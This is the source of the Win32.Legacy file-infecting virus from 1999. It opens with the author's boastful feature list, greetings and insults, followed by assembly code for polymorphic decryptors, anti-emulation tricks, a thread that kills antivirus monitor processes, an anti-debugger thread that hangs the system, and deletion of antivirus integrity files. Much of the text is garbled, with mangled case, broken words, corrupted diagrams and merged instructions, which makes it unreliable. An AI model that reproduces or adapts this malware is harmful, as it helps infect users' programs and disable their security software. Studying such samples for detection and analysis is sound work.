[Win32.legacy] - Multithreaded / Poly / EPO / MMX / RDA / Antiav / PE / RAR / ARJ, ETC.
Copyright (c) 1999 by Billy BelceBu / IKX
;
[Introduction]
;
This is a polymorphic heavily armoured Multitask Virus. It's Undetectable
; by All the Most Powerful AVS (August 1999) Such As Are Avp, NODICE, ETC. IT
Has Two Layers of Encryption (as my win32.thorin), The First One is polymo-
; RPHIC, Made by mmxe v1.01, and the second one is an antiDebug / antiemulator
One, Using Also Mmx Opcodes if Available. So, this is the world's first VI-
Rus sale mmx opcodes, and I am proud of it! :) Well, The Polymorphic ENGI-
Ne Has A Sorta Plug-in, Called Phire V1.00 That Is Able To Generate A 256
Polymorphic block of code That Will Be Placed At host entrypoint for pass
; the control to the polymorphic decryptor at the last section. so, it's so-
METHING LIKE AN EPO Feature. this is also my first virus what infects
Archives (Rar & Arj). This Virus Also Have Rda Features, by Means of My New
ENGINE CALLED IENC, THAT WORKS with Little Blocks of Code, Instead A Whole
Virus. there. there is 13h;) Routines in this Virus That Are Encrypted Independe
; NTLY from the Two Normal Layers of the Virus ... it's a great feature :)
; This babe makes my thorin to see Seem a Joke ... It beats thorin in Almost Every
Aspect. The Only Bad Point this Virus Has IS, in Some Extreme Cases, The
Speed. I've Tried to Fix That Optimizing A Bit The Thread Execution, And
ITS Order. Also, I'VE Made The Virus to Be Executed with The Highest Priori
Ty of Execution. So The Delay Will Be Minimal (I Hope), And in Fastest PCS,
Will Be Unnoticeable. It's Possible That Virus Has Bugs, But in
All my tests, it worked perfectly. But nothing is perfect .;
Well, That's Too Much for An Introduction. Let's See a Deeper Description
o all this.
;
[Threads]
;
The Virus' Execution IS FOLLOWS:
;
Infected File ????????????
; ???????????? thread 1? ????????????
;?> ?????? ???????????? ??? thread 2?
;? Virus ??????????????????????????????
;???>?? ????????????
; ???????????> ??? ??? Thread 3?
;? Main?> ????? ????????????
;???? "> ?????
;??> ????????????????
;??? ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
; ???????????? ????????????????
; ?????????
; ?????????????????????????
;? Thread 6?
; ????????????
;
;? -> thread being executed
;
; So, As You Can See, The Virus Body Launches A Thread, The Main Thread, And
The Main Thread Launches 6 Threads, And Controls Their Execution Flow: The
First 4 Ones Are Launched and Executed At the Same Time, While The Followin
2 Must Follow Another. Let's See What Does Each Threads of the AFTER.
;
Thread 1: this Thread is Executed The First, And IT Consists in A
Loop what terminates the process of avp monitor and
AMON (Monitor of Nod-Ice).
; Thread 2: this thread is the anti-debugging one. Application Level
Debuggers Should Die with IT.
; Thread 3: this thread deletes from the current directory MOST OF
All The Integrity Checks of All Av and Programs.
; Thread 4: This Thread Hooks All Possible Apis from Host Import TA-
BLE, SO IT IS The Perprocess Residence Thread.
; Thread 5: this thread prepares the Virus for Infection, Setting Up
The Directories To Infect, ETC .; Thread 6: This Thiead is buy for infect in all the retrieved dir-
Ectories All EXE, SCR, CPL, RAR, ARJ FILES.
;
; Each Thread is protected by a seh handler, so we can handle all the possi-
Ble Errors That Could Happen in Their Execution. This Adds More Security To
The Virus, And Makes It to Become Lotsa More Robust.
;
[ENGINES]
;
This Virus Features 3 Engines: MMXE V1.01, PHIRE V1.00 AND IENC V1.00. Lets
See What Will Do Each ONE of Them:
;
; Mmxe: this Engine Will Generate Two Decryptors, That Will Be Able
To Decrypt The First Encryption Layer of The Virus (But The
Oly One That Is Polymorphic). Why Two Decryptors? Well, THE
; Execution of One or Another Depends of The Existence of the EXISTENCE OF THE
MMX opcodes (I.E. IF the cpu is mmx). One of the one
That Will Be Executed Firstly, HAS MMX Opcodes Used AS Gar-
Bage, And ITS Decryption Operation IS Also A MMX Opcode.
The second decryptor is an an 'ussual' Polymorphic One.
; Phire: this is a plug-in for mmxe. It generates a block of 256 by-
TES OF POLYMORPHIC CODE THAT WILL BE Placed At the entrypo-
Infa Particular eti That Code IS, BESIDES
The entrypoint obscuring (EPO) Ability That It Gives To The
; Virus, Is That The Generated Code Will Generate An Excepti-
On Handler (SEH), for Laterly Generate A Fault, Thus Bypas
Sing The Control to the Handler, That Will Pass the Control
To the mmxe decryptor. This Will Stop Every Known Emulator.
; IENC: The Internal Encryptor Is A RDA ENCRYPTOR / DECRYPTOR THAT
Brings you the Possibility of Encrypt / Decrypt Blocks of ENCRYPT
Code Inside The Virus Itself. It's very simple, Besides That
Is Very Useful for Annoy A Bit More The Av People. And That; Is My Target.
;
[Decryption]
Glossary.-
; ???????????????
;? Poly # 1? Poly # 2- mmxe generated Decryptor
;??? Now jump over all the encr # 3- Second Encryption Layer
:??????????.?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
;? REST? OVERWRITTEN TILL REACH
;????.?...........
Host??
;????
;?????
:? Poly # 2? Now decrypt the next layer
;???????
; ENCR # 3? Final Decryption of Virus Body
;???????
;? Virus code! ??> Some Independent Blocks of this Are Also Encrypted.
; ???????????????
;
[APIS Used]
;
They is Retrieved Knowing Only Their CRC32. This, as you can see, IS A
Great Saving of bytes.
;
; Kernel32.dll - FindfirstFilea, FindNextFilea, FindClose,
CreateFilea, Deletefilea, SetFilePointer,
SetFileAttributesa, CloseHandle,
GetcurrentDirectorya, SetCurrentDirectorya,
GetwindowsDirectorya, GetSystemDirectorya,
CreateFilemappingA, MapviewWoffile,
UnmapViewoffile, setndoffile, getProcaddress,
LoadLibrarya, GetSystemTime, CreateThread,
WaitforsingleObject, Exitthread, GettickCount,
Freeelibrary, Writefile, GlobalAlloc, GlobalFree,
GetFileSize, getFileAttributesa, readfile,
GetCurrentProcess, getPriorityClass,
; SetPriorityClass
;
; User32.dll - FindWindowa, PostMessagea, Messageboxa
; Advapi32.dll - RegcreateKeyexa, RegSetValueexa
;
[APIS HOOKED]
;
All these apis are part of the '@@ hookz' structure (see Data Zone of Virus)
And they area got from the import Table Only Knowing ITS CRC32. THIS IS A
Nice Feature, We save Many Bytes with it.
;
; With generic hooker - movefilea; - Copyfilea
- getFullPathnamea
- deletefilea
; - WINEXEC
; - CreateFilea
; - CREATEPROCESSA
; - getFileAttributesa
- setfileAttributesa
; - _Lopen
; - Movefileexa
; - CopyFileExa
; - OpenFile
;
; With special hooker - getProcAddress
; - FindfirstFilea
- FindNextFilea.
;
[Features]
;
Now Here Will Go THE BLESSED LIST OF WHAT This Babe is Able to do:
;
; Infects EX, SCR AND CPL Files.
; DROPS An Infected File to Rar and Archives (Dropper IS Packed)
All targets (exe / scr / cpl / rar / arj) Are Infected if they:
; - Are IN / Windows Directory
; - Are IN / Windows / System DIRECTORY
; - Are IN Current Directory
; - area accessed by one of the hooked functions
Obtains API Addresses Knowing Only ITS CRC32 (ET & IT).
; EntryPoint Obscuring (EPO), Used PHIRE V1.00
; TWO LAYERS OF ENCRYPTION:
; - mmxe generated Decryptor
SIMPLE NON-POLY MMX Decryptor, Also Anti-Emulators.
Some Blocks of Code Are Encrypted (RDA) with Ienc v1.00
Anti-emulation and anti-heuristic techniques.
; Anti-Monitors, Kills The Process of Avp Monitor And Amon
; Anti-Debugging (SEH, ISDEBUGGERPRESENT, FS: [20H], Threads, Softice
; Multithread (See 'Threads' Description Above)
Per-Process Residence (ImportTable / GetProcaddRess)
Fast Infector (FindfirstFilea / FindNextFilea)
Kills av curc files.
; Infects All Pe Without Caring About ITS ImageBase.
; Avoid Problems with .Reloc Section
; Able to Work Under Win95, Win98, Winnt, And Win2k.
; PayLoad: Shows a Lame Messagebox with a Lame Message, Andreat IT
Makes a little change.
[Greetings (Random ORDER)]
;
; Qozah / 29A -> Finally You Did It! Win32.Unreal Rulez!
Benny / 29A -> I'll Wait for your meta! Btw, bring me a czech beer
; Vecna -> Pray to the real and only god ... yourself!
Super / 29A -> Thanx for Pointing Me Bugs and Optimization ...
; B0Z0 / IKX -> I Recommend you a padanian band caled lacuna coil
; STARZER0 / IKX -> What DID You Say To Yer Mother for Go To Amsterdam?
; INT13H -> espero tu carta ANSIOSO!
YPSILON -> Finish Vas Goddamit !!
; GRIYO / 29A -> EL? Nico Que Llama "Cagadas" a Sus Virus :)
; MDRILLER / 29A -> You Help Me, I Help You ... Compensation LAW;)
; OWL [FS] -> You'll Find The Perfect Girl for your needs ...
; VirusBust / 29A -> espero que season feliz con tu nuevo estado civil;)
; Mrsandman -> Lo Mismo TE DIGO ...
; Jqwerty -> Aunque Nos Pese, PueS Tambien TE DIGO LO MISMO;)
; WINTERMUTE -> Algun Dia Entender S A Estos Mon? Gamos X-D
; TCP / 29A -> I'll Wait for your HLL pe infector :)
; Rajaat -> The Twisted Nails of Faith ... COF Rulez!
; Somniun -> Mandame Un Mail, please
; Septic -> You'D Have My Vote ... Sure!
; Technophunk / ti-> i recomment you to hear marilyn manson ...
; Mandragore -> Mail Me Pleeeeese
; Thewizard -> a Ver Cuando VEO Algo Tuyo Pa Win32 ...
Navi / phymosys -> y La # 9? :)
; Frontis -> amo a tu Plextor DE 8X!
; Nigr0 -> Yo Me Jubilare Cuando Tu Entres En Algun Grupo :)
SLAGEHAMMER -> COME to VALENCIA!
; T-2000 -> i Didn't Liked to Be Infected with Yer Kriz;); ZAXON -> Este Virus de Abajo TE VA A infectar ...
Gigabyte [UC] -> What about what VBS WORM?
YESNA -> Puta!
; Lord Julus -> Get a BLIND Guardian CD!
; Hansi Kursch -> i Hope You'll Be Able To Compose Again Soon!
; J.r.tolkien -> Awesome Folklore!
Karl Marx -> for Give Me Something to Believe In.
;
[FUCKS]
;
; J. M. Aznar -> I'll Dance over Your Grave, Fascist Sucker
; E. Zaplana -> Ke Haze Un Tio de Murzia Presidiendo Mi Comunidad?
; J. Gil Y Gil -> Tiene Una Estatua de Franco ... No Comments.
; A. Pinochet -> To Prison, MotherFucker!
; F. Franco -> I'm happy: you're dead
; A. Hitler -> The Worst in All The Mankind History
; S. Milosevic -> The Hitler of Our Days
; B. Yeltsin -> Stop Drinking Vodka!
; All the USA -> You CAN Control Others Governments, But Not Me.
;
[Final Thoughts]
;
This Virus (AND ITS Possible Next Versions) Will BE Last "Megainfector".
I WILL PROBABLY Add to It Zip Infection, A Compression Engine, A Code EMU-
Lator (That i Have Almost Finished) and more Features, But I Think I'll
Guide My Steps to Smaller Viruses. For Example, I am Writing Another Ring-0
Virus, That Will Feature S & D Technology (of course, giving the deserved
; Greet to SSR, And i am Writing Some Engines Such As a Compression One, A
Code Emulator, a self-emulated poly engine, and much more. Also, I'm MAKING
The first steps of the itxoiten project, building its macros, and developing
The itx header. As you can see, I'm really active in code, i hope i'll be; able to publish some of trings soings soings soings soings soings soings soings soings soings soizzy
; Shed My Virus Writing Guide for Win32, That IS, AT THIS MOMENT, MUCH BIGGER
That ITS Equivalent for MS-DOS. I Hope to Finish It Soon Too. Well ... Now
; it's my time to talk about "my thing" :) OK, OK, I'll Tell you about what
Happened me this last week ... firstly (and painly), My Beloved Panasonic
(PAID with my owna money) Have Broken Up ... Secondly, My Headphones
ip. I think it is happened because i there
; Recently Had a Motorbike Crash (Finishing with Myself Rolling over the
Fucking Road) While Hearing Music with the Discman ... and, today, while
i Was Going (Again) with the motorbike, a fucking bee have bitten me at
My FACE (AND NOW My Face Seems A Fucking Ball Because IT). DAMN, THIS WEEK
Hasn't Been The Best One of My Life. I Can Only now Day Thing, That
Only The Spanish Readers Will Understand: Mekag? EN DIOS! OK, this Is Enough
; for today ... fade to black ...
;
; -To code is ask: one error, and you'll Cry the rest of your life-
(Murphy's Law)
;
; (c) 1999 Billy BelceBu / IKX
.586p
.MODEL FLAT
Extrn shellabouta: proc; ThanX 4 this c00l api, vecna
EXTRN EXITPROCESS: PROC
True EQU 01H
False Equ 00H
Debug Equias
Virus_size EQU (Offset Virus_END-OFFSET VIRUS_START)
SHIT_SIZE EQU (Offset Delta-Offset Legacy)
Section_flags EQU 00000020h OR 20000000h OR 80000000H
Temp_attributes EQU 00000080H
N_Handles EQU 50D
WFD_HNDSIZE EQU N_HANDLES * 8
n_infections EQU 05H
Mark Equ 04ch; Pe Header WHERE PUT MARK
INF_MARK EQU "Ycgl"; Mark for Infected pe'Sarchive_mark EQU "GL"; Mark for Infected Archives
KERNEL_W9X EQU 0BFF70000H; WIN95 / 98 KERNEL
KERNEL_WNT EQU 077F00000H; Winnt Kernel
KERNEL_W2K EQU 077E00000H; WIN2000 KERNEL
NDAY EQU 31D; day when activate payload
NMONTH EQU 07D; MONTH WHEN ACTIVATE PAYLOAD
BILLY_BEL EQU 0BBH; Any PROBLEM? :)
Thread_sleeping EQU 00000000H
Thread_Active EQU 00000001H
; INTERESTING Macros for My Code
CMP_ Macro REG, Joff1; Optimized Version of
Inc reg; cmpreg, 0ffffffh
JZ Joff1; JZ Joff1
Dec corre; the code is reduced in 3
ENDM; BYTES (7-4)
Pushs Macro String2PUSH
Local __ @@ __
Call __ @@ __
DB string2push, 00h
__ @@ __:
ENDM
EOSZ_EDI Macro
XOR Al, Al
Scasb
JNZ $ -1
ENDM
Apicall Macro Apioff; Optimize Muthafucka!
Call DWORD PTR [EBP APIOFF]
ENDM
VSIZE Macro
DB Virus_size / 10000 mod 10 "0"
DB Virus_size / 01000 MOD 10 "0"
DB Virus_size / 00100 MOD 10 "0"
DB Virus_size / 00010 MOD 10 "0"
DB Virus_size / 00001 Mod 10 "0"
ENDM
.DATA
Szmessage DB "First Generation Sample", 10
DB "(c) 1999 BilceBu / IKX", 0
Don't Care About What The People; Thinks About You; They Are Too Busy
Thinking How to Know What Do you think of them. (Murphy's Law)
.code
; <---
Below Code (Until the loop "Don't Travel with the Virus. It Putz Da Correct
CRC32 of all the code blocks That area going to be encrypted independently
WITH IENC ...
; --->
Legacy1:
LEA ESI, IEENC_STRUC; Pointer to Ienc Structure
MOV ECX, N_IENC_BLOCKS; Number of Code Blocks
LGCYL00P:
LodSw; Get Size Of Block
Cwde; Clear MSW of Eax
XCHG EDI, EAX; EAX = Sizelodsw; Get Relative Ptr To Block
Cwde; Clear MSW of Eax
Add Eax, Offset Virus_Start; RVA >> VA
Pushhad; Preserve All Registers
XCHG ESI, ESI; ESI = Ptr To Block
Call CRC32; Get ITS CRC32
MOV [ESP.PUSHAD_EBX], EAX; Preserve After Popad =)
Popad; Restore All Regs
Sub Eax, 08h; Fix Pointer
MOV [EAX], EBX; Store Block's CRC32
Loop LGCYL00P; Repeat The Same with All
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Virus Start ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
;
; ?????????????????????????;
;;
I Wanna Die Young; ???????????????????????????
And sell my soul; ????????? ?????????????? ?????????
Use Up All your Drugs; ??? ??? ??? ??????????????
And make Me com; ??? ??? ????????????????
Yesterday man,; ????????????????
i Was a nihilist and; ?????????????????????????????????
Now Today I'm; ???????????????????????????????????
Just Too fucking bored;
;; -i don't like the drugs but the drugs like me-
-Marilyn manson-;
; ?????????????????????????;
Virus_Start Label Byte
Legacy:
DB LIMIT DUP (90H); Space for the Poly Decryptor
Pushad; Push All da Shit
MOV EBX, ESP; Anti Nod-Ice Trick
Push CS
POP EAX
CMP EBX, ESP
Jnz Real
Call seh_trick; kill emulators
MOV ESP, [ESP 08H]
XOR EDX, EDX
POP DWORD PTR FS: [EDX]
POP EDX
JMP IMPROVISED_DELTA
Decryptor:
POP ESI; ESI = Ptr To Code to Decrypt
MOV ECX, ((Offset Virus_end-Offset Crypt) / 4)
Mov EBX, 12345678H
Org $ -4
Key DD 00000000H
Mov EDI, ESI
Pushhad
XOR EAX, EAX
INC EAX
CPUID; Check for MMX Presence ... BT EDX, 17h; Bit 17h, please!
Popad
JNC Not_mmx; DAMN!
@@ __ ??:
DB 00FH, 06EH, 00EH; MOVD MM1, [ESI]
DB 00FH, 06EH, 0D3H; MOVD MM2, EBX
DB 00FH, 0EFH, 0CAH; PXOR MM1, MM2
DB 00FH, 07EH, 00; MOVD [ESI], MM1
Add ESI, 4; Get Next DWORD
Loop @@ __ ??; and decrypt it
JMP RealEp; Jump To Unencrypted Code
NOT_MMX:
LOAD DWORD To Decrypt
XOR EAX, EBX; Decrypt IT
Store The Decrypted DWORD
LOOP NOT_MMX; and Loop Until All Decrypted
JMP RealEp; Jump To Unencrypted Code
SEH_TRICK:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
Dec byte PTR [edx]; bye bye emulators
JMP RealeP; Die Nod !!! Muahahahah!
Improvised_delta:
Call Decryptor
; Let me see you stripped ...
Crypt label byte
DB 00H, "Welcome to The Realm of The Legacy of Kings ...", 00h
Realep: Call delta; Hardest code to undestand;)
Delta: POP EBP
MOV EAX, EBP
Sub EBP, OFFSET DELTA; EBP = DELTA OFFSET
Sub Eax, Shit_Size; Obtain At Runtime Thae
Sub Eax, 00001000H; ImageBase of the Process
NEWEIP EQU $ -4
MOV DWORD PTR [EBP MODBASE], EAX; EAX = Process' ImageBase
Pushhad
Call changeseh; SEH RLZ :)
MOV ESP, [ESP 08H]; Fix Stack
JMP Restoreseh; and restore Old SEH HANDLER
Changeseh:
XOR EBX, EBX; EBX = 0
Push DWORD PTR FS: [EBX]; Save Old SEH HANDLER
MOV FS: [EBX], ESP; SET New SEH HANDLER
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK1-Block1
Block1 label byte
MOV ESI, [ESP 48H]; Get Program Return Address
MOV ECX, 05H; Limit
Call getk32
OR EAX, EAX; EAX = 0? if So, Error ...
JZ RESTORESEH; THEN WE Go AWAY ...
MOV DWORD PTR [EBP KERNEL], EAX; EAX Must Be K32 Base Address
Lea ESI, [EBP @@ Namezcrc32]; ESI = Pointer to CRC32 Arraya EDI, [EBP @@ offsetz]; EDI = Where Put Addresses
Call getapis; Retrieve All Apis
Lea Edi, [EBP Random_seed]; Initialize Slow Random Seed
Push EDI
Apicall_getsystemtime
Apicall_GetcurrentProcess; this Virus Is Slow, SO I'm
; Looking in this router
Push Eax; for the Wanted Speed
MOV DWORD PTR [EBP CURRENTPROCESSHANDLE], EAX
Push Eax; Get The Original Priority
Apicall_GetpriorityClass; Class
MOV DWORD PTR [EBP OriginalPriorityClass], EAX
POP ECX
XCHG EAX, ECX; fail? duh!
Jecxz ErrorCreatingmainThread
Push 80h; set the priority needed for
Push Eax; A Faster Execution
Apicall_SetPriorityClass
XOR EDX, EDX
Lea Eax, [EBP LPTHREADID]
Push Eax; LPTHREADID
Push EDX; DWCREATIONFLAGS
Push EBP; LPPARAMETER
Lea Eax, [EBP MAINTHREAD]
Push Eax; LPStartAddress
Push Edx; DWSTACKSIZE
Push Edx; LPTHREADATTRIBUTES
Apicall_createthread
XCHG EAX, ECX; Error?
JECXZ ErrorCreatingmainThread; DAMN ...
XOR Eax, Eax; Wait Infinite Seconds Until
Dec Eax; main thread is finished
Push eax; push -1
Push Ecx; Push Main Thread Handle
Apicall_WaitForsingleObject
Eblock1 label byte
Push 12345678H; Put Again the Original
OriginalPriorityClass EQU $ -4; Priority of The Process for
Push 12345678H; Avoid Suspitions
CurrentProcesshandle EQU $ -4
Apicall_SetPriorityClass
Push Wfd_Hndsize; Hook Some Mem for WFD_Handles
Push 00000000H; Structure
Apicall_GlobalAlloc
MOV DWORD PTR [EBP WFD_HNDINMEM], EAX
Call payload; hohohoho!
ErrorCreatingmainthread:
OR EBP, EBP; Is 1st Gen?
JZ Fakehost; if So, Jump to the Fake Host
RESTORESEH:
XOR EBX, EBX; EBX = 0
POP DWORD PTR FS: [EBX]; Restore Old SEH HANDLERPOP EAX; Remove Shit from Stack
Popad; restore Old Registers
Call restoreoldBytes; restore host's 1st bytes
Popad; Restore All!
MOV EBX, 12345678H; C'MON!
Org $ -4
Oldeip DD 00001000H
Add EBX, 12345678H; It's ON!
Org $ -4
Modbase DD 00400000H
Push Ebx; Pass Control to the Host
Ret; Code ...
Justice is Lost, Justice Is Rad, Justice IS GONE ...
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Restore the first | @tes of the host ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
RestoreoldBytes:
MOV EDI, DWORD PTR [EBP OLDEIP]
Add EDI, DWORD PTR [EBP MODBASE]; EDI = PTR to Host's EP
Lea ESI, DWORD PTR [EBP OLDBYTES]; ESI = Ptr To ITS Orig. bytes
Mov ECX, PLIMIT; ECX = bytes to restore
REP MOVSB; RESTORE IT!
RET
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || the main thread of the virus ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
;
Higher you are, harder you fall
;
MAINTHREAD Proc Pascal Delta_thread: DWORD
MOV EBP, DELTA_THREAD; EBP = DELTA OFFSET
Pushhad
Call Mt_Setupseh; setup a new seh handler
MOV ESP, [ESP 08H]
JMP MT_RESTORESEHH
MT_SETUPSEH:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK2-Block2
Block2 label byte
Call getusefulinfo; Retrieve Useseful Info
MOV ECX, NTHREADS; ECX = Number of Threads to
Launch
Lea ESI, [EBP ThreadStable]; ESI = Ptr To Thread Table
LoopoflaunchallthReads:
Push Ecx; Preserve ECX
XOR EDX, EDX; EDX = 0
Lea Eax, [EBP LPTHREADID]
Push Eax; LPTHREADIDPUSH EDX; DWCREATIONFLAGS
Push EBP; LPPARAMETER
Lodsd
Add Eax, EBP
Push Eax; LPStartAddress
Push Edx; DWSTACKSIZE
Push Edx; LPTHREADATTRIBUTES
Apicall_createthread
POP ECX
Loop loopoflaunchallthreads
Control loops of all threads
Inc Byte PTR [EBP TKM_SEMAPHORE]; Init Thread 1
Inc Byte PTR [EBP TAD_SEMAPHORE]; Init Thread 2
Inc Byte PTR [EBP TDC_SEMAPHORE]; Init Thread 3
Inc Byte PTR [EBP TPP_SEMAPHORE]; Init Thread 4
Inc Byte PTR [EBP TPI_SEMAPHORE]; Init Thread 5
TAD_CL: CMP BYTE PTR [EBP TAD_SEMAPHORE], Thread_sleeping
JNZ TAD_CL; WAIT for Thread 2 End
CMP Byte PTR [EBP Softice], 00H
JNE TKM_CL
TPI_CL: CMP BYTE PTR [EBP TPI_SEMAPHORE], Thread_sleeping
JNZ TPI_CL
Inc Byte PTR [EBP TIF_SEMAPHORE]; Init Thread 6 After Thread 5
TIF_CL: CMP BYTE PTR [EBP TIF_SEMAPHORE], Thread_Sleeping; Ends
JNZ TIF_CL
TKM_CL: CMP BYTE PTR [EBP TKM_SEMAPHORE], Thread_sleeping
JNZ TKM_CL; WAIT for Thread 1 End
TDC_CL: CMP BYTE PTR [EBP TDC_SEMAPHORE], Thread_sleeping
JNZ TDC_CL; Wait for Thread 3 End
TPP_cl: CMP BYTE PTR [EBP TPP_SEMAPHORE], Thread_sleeping
JNZ TPP_CL; Wait for Thread 4 End
Eblock2 label byte
MT_RESTORESEH:
XOR EDX, EDX
POP DWORD PTR FS: [EDX]
POP EDX
Popad
JMP EXITTHREAD
MAINTHREAD ENDP
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || this procedure makes the thread what call it to be closed ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
Exitthread:
Push 00h
Apicall_exitthread
RET
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Thread Used for Kill Tsr Monitors (AVP & NOD) ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] [] THRKILLMONITORS PROC PASCAL DELTA_THREAD: DWORD
MOV EBP, DELTA_THREAD
XOR ECX, ECX
Tkm_sleep:
Mov Cl, Thread_sleeping
TKM_SEMAPHORE EQU $ -1
JECXZ TKM_SLEP
Pushhad
Call Tkm_Setupseh; Setup a SEH HANDLER
MOV ESP, [ESP 08H]
JMP TKM_RESTORESEHH
TKM_SETUPSEH:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
Call Ienc_Decrypt; Encrypt this Block
DD 00000000h
DD EBLOCK3-Block3
Block3 label byte
LEA EDI, [EBP MONITORS2KILL]; EDI = Ptr To Array of Mons.
KM_L00P:
Call TerminateProc; Terminate ITS Process
EOSZ_EDI; End of String of EDI
CMP BYTE PTR [EDI], BILLY_BEL; END OF ARRAY?
JNZ KM_L00P; KEWL.
Eblock3 label byte
TKM_RESTORESEH:
XOR EDX, EDX
POP DWORD PTR FS: [EDX]
POP EDX
Popad
AND Byte PTR [EBP TKM_SEMAPHORE], Thread_sleeping
JMP EXITTHREAD
THRKILLMONITORS ENDP
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || thread for kill the application level debuggers ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
Thrantidebugger Proc Pascal Delta_thread: DWord
MOV EBP, DELTA_THREAD
XOR ECX, ECX
TAD_SLEP:
Mov Cl, Thread_sleeping
TAD_SEMAPHORE EQU $ -1
Jecxz tad_sleep
Pushhad
Call Tad_Setupseh
MOV ESP, [ESP 08H]
JMP TAD_RESTORESEHH
TAD_SETUPSEH:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK4-Block4
Block4 label byte
And byte PTR [EBP Softice], 00H
; I'm a Softice Add ... Any Problem? :)
IF Debug
Else
Detectsice:
Lea EDI, [EBP Drivers2avoid]
SearchDriverz:
XOR Eax, Eax; This Little Trick Allows
Push Eax; US to Check for Drivers,
Push 00000080h; So we can check for urpush 00000003h; Beloved Softice in ITS
Push Eax; Win9x and Winnt Versions!
INC EAX
Push EAX
Push 80000000h OR 40000000H
Push EDI
Apicall_createfilea
INC EAX
JZ Nodriverfound
Dec EAX
Push EAX
Apicall_closehandle
Inc Byte PTR [EBP Softice]
NODRIVERFOUND:
EOSZ_EDI
CMP Byte PTR [EDI], BILLY_BEL
JNZ SearchDriverz
ENDIF
Some_antidebug:
MOV ECX, FS: [20H]; ECX = Context of Debugger
Jecxz more_antidebug; if ECX <> 0, We're debugged
JMP HANGIT
More_ntidebug:
Pushs "isdebuggerpresent"
Push DWORD PTR [EBP KERNEL]
Apicall_Getprocaddress
XCHG Eax, Ecx; Same Than, BUT API
JECXZ TAD_EXIT; BASED
Call ECX
XCHG EAX, ECX
Jecxz tad_exit
HANGIT: XOR ESP, ESP; Hahahah! Die-Die-Die !!!
CLI
Call $ -1
EBLOCK4 Label Byte
TAD_EXIT:
TAD_RESTORESEH:
XOR EDX, EDX
POP DWORD PTR FS: [EDX]
POP EDX
Popad
And Byte PTR [EBP TAD_SEMAPHORE], Thread_sleeping
JMP EXITTHREAD
ThRANTIDEBUGER ENDP
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || thread use for delete av crc files ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
THrDeleteCrc Proc Pascal Delta_thread: DWORD
MOV EBP, DELTA_THREAD
XOR ECX, ECX
TDC_SLEP:
Mov Cl, Thread_sleeping
TDC_SEMAPHORE EQU $ -1
JECXZ TDC_SLEP
Pushhad
Call TDC_Setupseh
MOV ESP, [ESP 08H]
JMP TDC_RESTORESEHH
TDC_SETUPSEH:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK5-Block5
Block5 label byte
Lea EDI, [EBP Files2kill]; Load Pointer to First File
Killem: Push EDI; Push File To Erase
Apicall_Deletefilea; delete it!
EOSZ_EDI
CMP Byte PTR [EDI], BILLY_BEL
JNZ Killem
Eblock5 label bytetdc_restoreseh:
XOR EDX, EDX
POP DWORD PTR FS: [EDX]
POP EDX
Popad
AND Byte PTR [EBP TDC_SEMAPHORE], Thread_sleeping
JMP EXITTHREAD
THrDeleteCrc ENDP
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || thread buy for retrieve all the useful info for infection ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
THRPREPAREINF PROC PASCAL DELTA_THREAD: DWORD
MOV EBP, DELTA_THREAD
XOR ECX, ECX
TPI_SLEP:
Mov Cl, Thread_sleeping
TPI_SEMAPHORE EQU $ -1
JECXZ TPI_SLEP
Pushhad
Call TPI_SETUPSEH
